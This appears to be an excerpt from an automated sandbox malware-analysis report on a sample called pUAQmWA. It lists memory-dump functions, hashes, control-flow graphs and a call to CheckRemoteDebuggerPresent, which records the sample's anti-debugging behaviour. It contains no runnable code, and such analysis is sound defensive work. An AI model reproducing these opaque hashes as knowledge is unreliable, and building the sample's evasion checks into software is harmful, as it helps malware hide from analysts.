                                                                                  • Source File: 00000009.00000002.1725638344.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_6870000_pUAQmWA.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: cf8ea9d26738dfa9611ad686b21526e522821108a9d55950574fed3851603b07
                                                                                  • Instruction ID: 2f5f15b71ddea2a0e4baac0d8995e843c5c581c952ebbe50627c176ec4f0d909
                                                                                  • Opcode Fuzzy Hash: cf8ea9d26738dfa9611ad686b21526e522821108a9d55950574fed3851603b07
                                                                                  • Instruction Fuzzy Hash: C9D0CA34D0820ECFDB44CF80C696AADBBB2AB08304F204014D00AA2280CB38AA02CF80
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 06874E99 Relevance: .0, Instructions: 9COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.1725638344.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_6870000_pUAQmWA.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: dcbbbf7aca9f92bf2725bf506d8508563d831585b420c6d6f6514baa9dfb1ec5
                                                                                  • Instruction ID: 8e037df6c1970bf691b81253af6e5c6699e168f9321f6a360bf825821e36b700
                                                                                  • Opcode Fuzzy Hash: dcbbbf7aca9f92bf2725bf506d8508563d831585b420c6d6f6514baa9dfb1ec5
                                                                                  • Instruction Fuzzy Hash: A2C09BF7954010DBD7811604C811F5E7B91FB25318F6984A0D140DA130D566D4385742
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 06876938 Relevance: .0, Instructions: 9COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.1725638344.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_6870000_pUAQmWA.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: ee0a4848a37f13f64043c8c99e77cdac3133acf08da9fce8fa824fec1e0ef1ba
                                                                                  • Instruction ID: 9baf1eeb2025235746d05c93b1b51c9d296058e113bd1076d5ac6ed5e27c795f
                                                                                  • Opcode Fuzzy Hash: ee0a4848a37f13f64043c8c99e77cdac3133acf08da9fce8fa824fec1e0ef1ba
                                                                                  • Instruction Fuzzy Hash: 16B01257EB51148FF38890148C03BBF0300D3B571CF2C44319962D9350C498FA2F40AB
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0687583C Relevance: .0, Instructions: 8COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.1725638344.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_6870000_pUAQmWA.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 1045c4585f526b422328584caf953428356135a43f2acb007658100c6b04c0f6
                                                                                  • Instruction ID: 7f09fa2b1a4dddd62046452862bc2ec057eb8a82493b42bda2f26c1b23c4e578
                                                                                  • Opcode Fuzzy Hash: 1045c4585f526b422328584caf953428356135a43f2acb007658100c6b04c0f6
                                                                                  • Instruction Fuzzy Hash: FEB0122A1F4E01AE968433688ED5D3FDC10EFB5704F408C117389C40248870D4A8912F
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Execution Graph

                                                                                  Execution Coverage:8.6%
                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                  Signature Coverage:0%
                                                                                  Total number of Nodes:3
                                                                                  Total number of Limit Nodes:0
                                                                                  execution_graph 13632 16c70b0 13633 16c70b1 CheckRemoteDebuggerPresent 13632->13633 13635 16c7136 13633->13635

                                                                                  Executed Functions

                                                                                  Function 016C6FA3 Relevance: 1.6, APIs: 1, Instructions: 127COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 441 16c6fa3-16c6fa5 442 16c701f 441->442 443 16c6fa7-16c6fab 441->443 445 16c7020-16c7026 442->445 444 16c6fad-16c6fb0 443->444 446 16c6ff6-16c6ff9 444->446 447 16c6fb2-16c6fba 444->447 448 16c6ffb-16c7000 446->448 449 16c7013-16c7015 446->449 452 16c6fbc-16c6fc1 447->452 453 16c6fc3 call 16c7180 447->453 448->445 449->444 451 16c7017-16c701c 449->451 451->444 452->446 454 16c6fc9-16c6fcb 453->454 455 16c6fcd-16c6fd2 454->455 456 16c6fe5-16c6fed 454->456 455->445 458 16c6fef-16c6ff4 456->458 459 16c7002-16c700a 456->459 458->445 461 16c700c-16c7011 459->461 462 16c6fd4-16c6fdc 459->462 461->445 464 16c701e 462->464 465 16c6fde-16c6fe3 462->465 464->445 465->445
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2887518450.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_16c0000_pUAQmWA.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 964398fd39d824aeb4b182cdcfb500aa1476c88d4665735d04deaec79f20891c
                                                                                  • Instruction ID: d4366c7c3d1cc9e817599a632dea2f274106cb766e6797b3593c9be00db30eb8
                                                                                  • Opcode Fuzzy Hash: 964398fd39d824aeb4b182cdcfb500aa1476c88d4665735d04deaec79f20891c
                                                                                  • Instruction Fuzzy Hash: 3441A8B6A0021A8FDB20DBA9C8447FEBBF5EF89620F14846ED445E7352D7389944CF64
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 016C70A8 Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 467 16c70a8-16c70aa 468 16c70ac 467->468 469 16c70ad-16c70ae 467->469 468->469 470 16c70b0 469->470 471 16c70b1-16c7134 CheckRemoteDebuggerPresent 469->471 470->471 473 16c713d-16c7178 471->473 474 16c7136-16c713c 471->474 474->473
                                                                                  APIs
                                                                                  • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 016C7127
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2887518450.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_16c0000_pUAQmWA.jbxd
                                                                                  Similarity
                                                                                  • API ID: CheckDebuggerPresentRemote
                                                                                  • String ID:
                                                                                  • API String ID: 3662101638-0
                                                                                  • Opcode ID: 61ad5cd57ec77b385bd0cb55a821a52fc86e0f629ed5ef52f80604c362f88409
                                                                                  • Instruction ID: 04123a648ec5616347ae94828a8305cf2303ed32763361eab404c12d188f1ffa
                                                                                  • Opcode Fuzzy Hash: 61ad5cd57ec77b385bd0cb55a821a52fc86e0f629ed5ef52f80604c362f88409
                                                                                  • Instruction Fuzzy Hash: AC2136B5900259CFCB10CF9AD884BEEBBF4EF49320F14846AE455A3751D778A944CFA1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 016C70B0 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 477 16c70b0-16c7134 CheckRemoteDebuggerPresent 480 16c713d-16c7178 477->480 481 16c7136-16c713c 477->481 481->480
                                                                                  APIs
                                                                                  • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 016C7127
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2887518450.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_16c0000_pUAQmWA.jbxd
                                                                                  Similarity
                                                                                  • API ID: CheckDebuggerPresentRemote
                                                                                  • String ID:
                                                                                  • API String ID: 3662101638-0
                                                                                  • Opcode ID: 17e986a09cf0b85c73982f802e7fc6a7b930474a421288661cd17685a843ec4b
                                                                                  • Instruction ID: 82c53d6981487f7ff31ef1cbf7999ba52a5fcb5ede4934c2aa9268b76dbfe6b9
                                                                                  • Opcode Fuzzy Hash: 17e986a09cf0b85c73982f802e7fc6a7b930474a421288661cd17685a843ec4b
                                                                                  • Instruction Fuzzy Hash: CD2114B18002598FCB10CF9AD884BEEBBF4AF49320F14846AE459A7251D778A944CFA5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0167D030 Relevance: .1, Instructions: 72COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2887079135.000000000167D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0167D000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_167d000_pUAQmWA.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 45eff710ed042126ed2445d53cece28f69a9337d4d0bbd239c362fbf2400f3ec
                                                                                  • Instruction ID: 3ef4ee63af2b652acbaea9839bd90405ffa9081b16a7f3737b1a7e8fa371d923
                                                                                  • Opcode Fuzzy Hash: 45eff710ed042126ed2445d53cece28f69a9337d4d0bbd239c362fbf2400f3ec
                                                                                  • Instruction Fuzzy Hash: 27212271504200DFCB12DF58DD80B26BBA5FF84314F24C96DD80A4B396C33AD447CA62
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0167D02B Relevance: .1, Instructions: 53COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2887079135.000000000167D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0167D000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_167d000_pUAQmWA.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                  • Instruction ID: b78e6da173779f4604733f96025d767e8f6751b51deac7a1dcb7450acde7becb
                                                                                  • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                  • Instruction Fuzzy Hash: BE11BB75504280CFDB12CF58D9C4B15BFA1FB84314F28CAAAD8494B756C33AD44ACB62
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%